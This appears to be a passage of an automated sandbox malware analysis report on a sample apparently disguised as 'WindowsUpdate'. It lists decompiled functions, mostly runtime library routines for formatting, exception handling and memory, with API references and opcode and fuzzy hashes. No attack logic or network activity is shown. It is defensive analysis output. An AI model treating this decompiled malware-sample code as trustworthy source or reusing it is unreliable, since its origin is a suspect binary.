                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _wprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2738768116-0
                                                                                                                    • Opcode ID: d9fc15d2961dd4f35383039be6e2641827a6309336160a2c73362129a3b00a7e
                                                                                                                    • Instruction ID: 6187ef578e7012270c4a98f81ffd4358547335169a1b67ccffcd6ebcd7d9b6b6
                                                                                                                    • Opcode Fuzzy Hash: d9fc15d2961dd4f35383039be6e2641827a6309336160a2c73362129a3b00a7e
                                                                                                                    • Instruction Fuzzy Hash: 0601F962B41368F3CA1077F96C46FAF375C9B45B30F20422BB91CB70C1D864940042BA
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0033305D Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E0033305D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E003335AA(_a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E003330E3(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E0033381F(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00333760(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                                                                                                                    0x00333060
                                                                                                                    0x00333066
                                                                                                                    0x003330d9
                                                                                                                    0x00000000
                                                                                                                    0x0033306d
                                                                                                                    0x0033306d
                                                                                                                    0x00333070
                                                                                                                    0x0033308b
                                                                                                                    0x0033308e
                                                                                                                    0x003330ae
                                                                                                                    0x003330c0
                                                                                                                    0x00333090
                                                                                                                    0x00333090
                                                                                                                    0x00333093
                                                                                                                    0x00000000
                                                                                                                    0x00333095
                                                                                                                    0x003330a7
                                                                                                                    0x003330a7
                                                                                                                    0x00333093
                                                                                                                    0x003330de
                                                                                                                    0x003330e2
                                                                                                                    0x00333072
                                                                                                                    0x0033308a
                                                                                                                    0x0033308a
                                                                                                                    0x00333070

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3016257755-0
                                                                                                                    • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                    • Instruction ID: f268884d19f6bf68a3e3a028b2f953c2d8cc69ccd9e106da18fa6e54d0b72cfe
                                                                                                                    • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                    • Instruction Fuzzy Hash: C701487240014EBBCF2B5E94DC818EE3F66BB18354F598515FA1A59431C336CAB1AB81
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00331B47 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 16%
                                                                                                                    			E00331B47(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t27;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				intOrPtr* _t31;
				void* _t33;

				_t35 = _a28;
				_t29 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t29);
					_push(_a4);
					E0033216F(_t27, _t29, _t30, _t35);
					_t33 = _t33 + 0x10;
				}
				_t36 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t29);
				}
				E0032A397(_t28);
				_push(_t30);
				_t31 = _a32;
				_push( *_t31);
				_push(_a20);
				_push(_a16);
				_push(_t29);
				E003323D0(_t27, _t31, _t36);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t31 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t29);
				_push(_a4);
				_t25 = E00331939(_t27, _t29, _t31, _t36);
				if(_t25 != 0) {
					E0032A367(_t25, _t29);
					return _t25;
				}
				return _t25;
			}













                                                                                                                    0x00331b4a
                                                                                                                    0x00331b4f
                                                                                                                    0x00331b52
                                                                                                                    0x00331b54
                                                                                                                    0x00331b57
                                                                                                                    0x00331b5a
                                                                                                                    0x00331b5b
                                                                                                                    0x00331b5e
                                                                                                                    0x00331b63
                                                                                                                    0x00331b63
                                                                                                                    0x00331b66
                                                                                                                    0x00331b6a
                                                                                                                    0x00331b6d
                                                                                                                    0x00331b72
                                                                                                                    0x00331b6f
                                                                                                                    0x00331b6f
                                                                                                                    0x00331b6f
                                                                                                                    0x00331b75
                                                                                                                    0x00331b7a
                                                                                                                    0x00331b7b
                                                                                                                    0x00331b7e
                                                                                                                    0x00331b80
                                                                                                                    0x00331b83
                                                                                                                    0x00331b86
                                                                                                                    0x00331b87
                                                                                                                    0x00331b8f
                                                                                                                    0x00331b94
                                                                                                                    0x00331b98
                                                                                                                    0x00331b9e
                                                                                                                    0x00331ba1
                                                                                                                    0x00331ba4
                                                                                                                    0x00331ba7
                                                                                                                    0x00331ba8
                                                                                                                    0x00331bab
                                                                                                                    0x00331bb6
                                                                                                                    0x00331bba
                                                                                                                    0x00000000
                                                                                                                    0x00331bba
                                                                                                                    0x00331bc1

                                                                                                                    APIs
                                                                                                                    • ___BuildCatchObject.LIBCMT ref: 00331B5E
                                                                                                                      • Part of subcall function 0033216F: ___BuildCatchObjectHelper.LIBCMT ref: 003321A1
                                                                                                                      • Part of subcall function 0033216F: ___AdjustPointer.LIBCMT ref: 003321B8
                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00331B75
                                                                                                                    • ___FrameUnwindToState.LIBCMT ref: 00331B87
                                                                                                                    • CallCatchBlock.LIBCMT ref: 00331BAB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2901542994-0
                                                                                                                    • Opcode ID: e773da7b83a15dac5bc00b18d7fe5226759331699da82cb122417f3b61336208
                                                                                                                    • Instruction ID: 252e046541c1ca9311c306712d90578324e588d1a6ab1072efafd12665cd59d2
                                                                                                                    • Opcode Fuzzy Hash: e773da7b83a15dac5bc00b18d7fe5226759331699da82cb122417f3b61336208
                                                                                                                    • Instruction Fuzzy Hash: 8C01D332400109BBCF13AF95DC41EDB7BAAAF48754F158114FA586A121D376E8A1ABA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 003AD5F3 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 21%
                                                                                                                    			E003AD5F3(void* __ecx, intOrPtr _a4) {
				intOrPtr _v4;
				void* _t10;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t17;
				void* _t18;
				void* _t20;
				void* _t22;

				_t18 = _t20;
				E003AD5C1(__ecx, _a4);
				 *0x474180(_a4, _t17);
				asm("int3");
				_push(_t18);
				E003B0ED0(_t22);
				E003B0F2D(_t14, _v4);
				E003AD6D4(0xff);
				asm("int3");
				_push(1);
				_push(1);
				_push(0);
				return E003AD770(_t10, _t15, _t16, _t22);
			}












                                                                                                                    0x003ad5f4
                                                                                                                    0x003ad5f9
                                                                                                                    0x003ad602
                                                                                                                    0x003ad608
                                                                                                                    0x003ad609
                                                                                                                    0x003ad60c
                                                                                                                    0x003ad614
                                                                                                                    0x003ad61f
                                                                                                                    0x003ad624
                                                                                                                    0x003ad625
                                                                                                                    0x003ad627
                                                                                                                    0x003ad629
                                                                                                                    0x003ad633

                                                                                                                    APIs
                                                                                                                    • ___crtCorExitProcess.LIBCMT ref: 003AD5F9
                                                                                                                    • __FF_MSGBANNER.LIBCMT ref: 003AD60C
                                                                                                                      • Part of subcall function 003B0ED0: __NMSG_WRITE.LIBCMT ref: 003B0EF7
                                                                                                                      • Part of subcall function 003B0ED0: __NMSG_WRITE.LIBCMT ref: 003B0F01
                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 003AD614
                                                                                                                      • Part of subcall function 003B0F2D: ___crtMessageBoxW.LIBCMT ref: 003B106D
                                                                                                                      • Part of subcall function 003AD6D4: _doexit.LIBCMT ref: 003AD6DE
                                                                                                                    • _doexit.LIBCMT ref: 003AD62B
                                                                                                                      • Part of subcall function 003AD770: __lock.LIBCMT ref: 003AD77E
                                                                                                                      • Part of subcall function 003AD770: __initterm.LIBCMT ref: 003AD846
                                                                                                                      • Part of subcall function 003AD770: __initterm.LIBCMT ref: 003AD857
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ___crt__initterm_doexit$ExitMessageProcess__lock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1204012526-0
                                                                                                                    • Opcode ID: 0f14dd9de8612eea1653548a99ee9828093b92422875be73fb56978249ac31ab
                                                                                                                    • Instruction ID: 73d3880c18b5ed9347e8d840a5e2d2246f9cd44e1e4fb12feca39485272a3fdf
                                                                                                                    • Opcode Fuzzy Hash: 0f14dd9de8612eea1653548a99ee9828093b92422875be73fb56978249ac31ab
                                                                                                                    • Instruction Fuzzy Hash: 9DE0EC3054420C7BDA1A3B50FC4BFA93A1ADB02B54F800420BB191CCA2DFA2AE955595
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 002FB807 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 425COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset
                                                                                                                    • String ID: 8bG$@aA
                                                                                                                    • API String ID: 2102423945-2348318730
                                                                                                                    • Opcode ID: 35f34800dfe30e8a64b0424f7a5e03b0dd3ac5f5a7aec775153db741aad45264
                                                                                                                    • Instruction ID: d107917668f2f97b7f4bf25aac559c768cfa8b4d5df7a054ecf5b8e8c66b1ac5
                                                                                                                    • Opcode Fuzzy Hash: 35f34800dfe30e8a64b0424f7a5e03b0dd3ac5f5a7aec775153db741aad45264
                                                                                                                    • Instruction Fuzzy Hash: 3AF1F170A1024A8FDB22DF24C841BBAFBB5BF14344F14447AEA459B352DB71E964CF91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0030D687 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 358COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 0030D6BD
                                                                                                                    • _memmove.LIBCMT ref: 0030D79C
                                                                                                                      • Part of subcall function 0031EFB7: _memset.LIBCMT ref: 0031F037
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset$_memmove
                                                                                                                    • String ID: `?C
                                                                                                                    • API String ID: 2532777613-10299428
                                                                                                                    • Opcode ID: 0768126f05df1d33f4908a53b53d999d03d70249aa0c6b8790922ed04c39da5d
                                                                                                                    • Instruction ID: 7c8b8a84a3d01e2fda17d2e5d3200533d89ddbeb8b943ea130c037a926bbd29c
                                                                                                                    • Opcode Fuzzy Hash: 0768126f05df1d33f4908a53b53d999d03d70249aa0c6b8790922ed04c39da5d
                                                                                                                    • Instruction Fuzzy Hash: 5BD10970A06345AFDB26DFA4C861BAAB7F4AF40304F158469EC499B7C2D735E940CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00307267 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 302COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset
                                                                                                                    • String ID: ($G$DXG
                                                                                                                    • API String ID: 2102423945-3586749926
                                                                                                                    • Opcode ID: 17224fdaf8242e8bc02be2df51ef3be814f63876267d998fec0f9f1e89d319ab
                                                                                                                    • Instruction ID: c5e703db0357db70939ba9cf92c40886dffe4abd6ae275ffafdfa418d609d18b
                                                                                                                    • Opcode Fuzzy Hash: 17224fdaf8242e8bc02be2df51ef3be814f63876267d998fec0f9f1e89d319ab
                                                                                                                    • Instruction Fuzzy Hash: 60C1D370E05249AFDB11CF99C8D1FAEBBB5EF09314F058069E909AB692D775F840CB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 002CCCF7 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 291COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset
                                                                                                                    • String ID: \
                                                                                                                    • API String ID: 2102423945-2967466578
                                                                                                                    • Opcode ID: 5ec17c61c1a874cfab6727c3c777990b3906f84e8775343c72e1e09b33feb76d
                                                                                                                    • Instruction ID: a10cc662c5fe235adef0e4b511dca948640493a8e1ada4556887aa4a3de33e90
                                                                                                                    • Opcode Fuzzy Hash: 5ec17c61c1a874cfab6727c3c777990b3906f84e8775343c72e1e09b33feb76d
                                                                                                                    • Instruction Fuzzy Hash: 2AA19271951219AADF21EB60DC46FEE777CBB04300F1401EAF60DE6181EB75ABA48F91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 002E6D37 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 284COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove_memset
                                                                                                                    • String ID: gfff
                                                                                                                    • API String ID: 3555123492-1553575800
                                                                                                                    • Opcode ID: 2ed781c94647d626ff7c3152cf985861a3023d85d4e9e2f380510339e90e5ab3
                                                                                                                    • Instruction ID: b5315895ad96744c202580d86f939ad55aa3d9e5cad972e76ff91f697dd7c381
                                                                                                                    • Opcode Fuzzy Hash: 2ed781c94647d626ff7c3152cf985861a3023d85d4e9e2f380510339e90e5ab3
                                                                                                                    • Instruction Fuzzy Hash: E4A1C2B1A0024A9BCF14CF5AD851AAEBBB5EF48314F49816DFC09AB341D731ED20CB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 002CEB67 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 219COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _strstr_wprintf
                                                                                                                    • String ID: ?,
                                                                                                                    • API String ID: 2849756785-3338570783
                                                                                                                    • Opcode ID: f0d8bffbf3f1ebf6812a9b1b557cfc74941f9af0c68199d9a223fbe142b002b3
                                                                                                                    • Instruction ID: ed384d5c69879830b948b6c4e8ab04d48885a2b77021f5644eaa831f4e356455
                                                                                                                    • Opcode Fuzzy Hash: f0d8bffbf3f1ebf6812a9b1b557cfc74941f9af0c68199d9a223fbe142b002b3
                                                                                                                    • Instruction Fuzzy Hash: 188181B1A00219ABDF20DF50DC84FE977BCAB44704F1446EDE709AB181D7B1AAD58F68
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 002CF577 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _malloc_memset
                                                                                                                    • String ID: \
                                                                                                                    • API String ID: 4137368368-2967466578
                                                                                                                    • Opcode ID: ccb84bc1d03478e58a9c485c33e6a5a62e6b55d56d23c6fb50a5dc27b78ba8bb
                                                                                                                    • Instruction ID: 89f9c65ef649ed6db614412d6a95b3db8c8dd95bc96f5b4ca2735c710bca5a70
                                                                                                                    • Opcode Fuzzy Hash: ccb84bc1d03478e58a9c485c33e6a5a62e6b55d56d23c6fb50a5dc27b78ba8bb
                                                                                                                    • Instruction Fuzzy Hash: 3B41E43090421A9BDF61CF24DD55FE9B7BDAF15304F2042EDE889A6052DBB19BC9CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 003094C7 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002E6677: _memmove.LIBCMT ref: 002E673B
                                                                                                                      • Part of subcall function 002E6677: _memmove.LIBCMT ref: 002E67B9
                                                                                                                    • _memset.LIBCMT ref: 00309517
                                                                                                                      • Part of subcall function 00311787: _memset.LIBCMT ref: 00311889
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove_memset
                                                                                                                    • String ID: H/$H/
                                                                                                                    • API String ID: 3555123492-1814350770
                                                                                                                    • Opcode ID: 5fb2e49733cf6262bce40ff74e77bf5818cc3af1dde9f2e0c44efe89c45ef555
                                                                                                                    • Instruction ID: 0416ae4f8daf22432e34400c478bf7b72d79fa1e3d775cfa2ae53136ebd8dccf
                                                                                                                    • Opcode Fuzzy Hash: 5fb2e49733cf6262bce40ff74e77bf5818cc3af1dde9f2e0c44efe89c45ef555
                                                                                                                    • Instruction Fuzzy Hash: ED41FB71901204BBDB129F65DC82FAEB7B8FF45714F144016FD08AB242E776A960CBE1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 003B10E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 003B0A4A: __getptd_noexit.LIBCMT ref: 003B0A4A
                                                                                                                    • __getbuf.LIBCMT ref: 003B117F
                                                                                                                    • __lseeki64.LIBCMT ref: 003B11EF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __getbuf__getptd_noexit__lseeki64
                                                                                                                    • String ID: @6H
                                                                                                                    • API String ID: 3311320906-2126515205
                                                                                                                    • Opcode ID: c181a644f904a2487bfcdad304fa3f83af33a5787edb318873f16d71bbf40be4
                                                                                                                    • Instruction ID: 66d09c1f0562d8c002b1f9b490ff7ffbb4f6053f02ef6c7d96273d94462e4d66
                                                                                                                    • Opcode Fuzzy Hash: c181a644f904a2487bfcdad304fa3f83af33a5787edb318873f16d71bbf40be4
                                                                                                                    • Instruction Fuzzy Hash: 75412671500B055EC3269F6CC861AFB77D89B45338B54C72DE7AACAED1E73498008B51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0030F727 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset
                                                                                                                    • String ID: 0ND
                                                                                                                    • API String ID: 2102423945-3294747520
                                                                                                                    • Opcode ID: a267b99868b94a5e31cdba44be911531a2e8406c5c1b768cd4217eca78ce4061
                                                                                                                    • Instruction ID: a13c85ae928bb1dabf1540d2cc997cbe529f3e7c928eea59b075b653dffd8040
                                                                                                                    • Opcode Fuzzy Hash: a267b99868b94a5e31cdba44be911531a2e8406c5c1b768cd4217eca78ce4061
                                                                                                                    • Instruction Fuzzy Hash: 48318FB1601B109FE3329F15D865743B7E4AF04B58F04452CD98A1BEC1D3BAF8488BC6
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 002E4637 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: n-
                                                                                                                    • API String ID: 4104443479-3028966130
                                                                                                                    • Opcode ID: 5403b217108bf9d38d0259e501238832d64b38f11e48a76145bbddf82995fc52
                                                                                                                    • Instruction ID: 3cb57e69679a7c265459ba71377a993e5f38af59d3a99bcd7c25bacac615b9a1
                                                                                                                    • Opcode Fuzzy Hash: 5403b217108bf9d38d0259e501238832d64b38f11e48a76145bbddf82995fc52
                                                                                                                    • Instruction Fuzzy Hash: AF118472504168AFCB14DF59D8C1EAABBE8FF49355B0440AAFE0CCB242D635DA11DBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00333AC8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __controlfp_s.LIBCMT ref: 00333AD6
                                                                                                                      • Part of subcall function 00336B56: __control87.LIBCMT ref: 00336B7A
                                                                                                                    • __invoke_watson.LIBCMT ref: 00333AE9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __control87__controlfp_s__invoke_watson
                                                                                                                    • String ID: csm
                                                                                                                    • API String ID: 1371525046-1018135373
                                                                                                                    • Opcode ID: 4b53eaab42b9ff57573e2217751ed2f7392e9cf52e54f971a8c1ca2ad5afeed9
                                                                                                                    • Instruction ID: 3b4748289699bace1450acc7d5c2b6ce5bae73da20aa59b74a0dcf9766ed7d5d
                                                                                                                    • Opcode Fuzzy Hash: 4b53eaab42b9ff57573e2217751ed2f7392e9cf52e54f971a8c1ca2ad5afeed9
                                                                                                                    • Instruction Fuzzy Hash: 6BF0B431508211DA8A3BA96978C6A9AF78D5F10311F568512F848CE661EBA0DFC0C0D6
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00322987 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _malloc.LIBCMT ref: 003229AA
                                                                                                                      • Part of subcall function 00327BCE: __FF_MSGBANNER.LIBCMT ref: 00327BE5
                                                                                                                      • Part of subcall function 00327BCE: __NMSG_WRITE.LIBCMT ref: 00327BEC
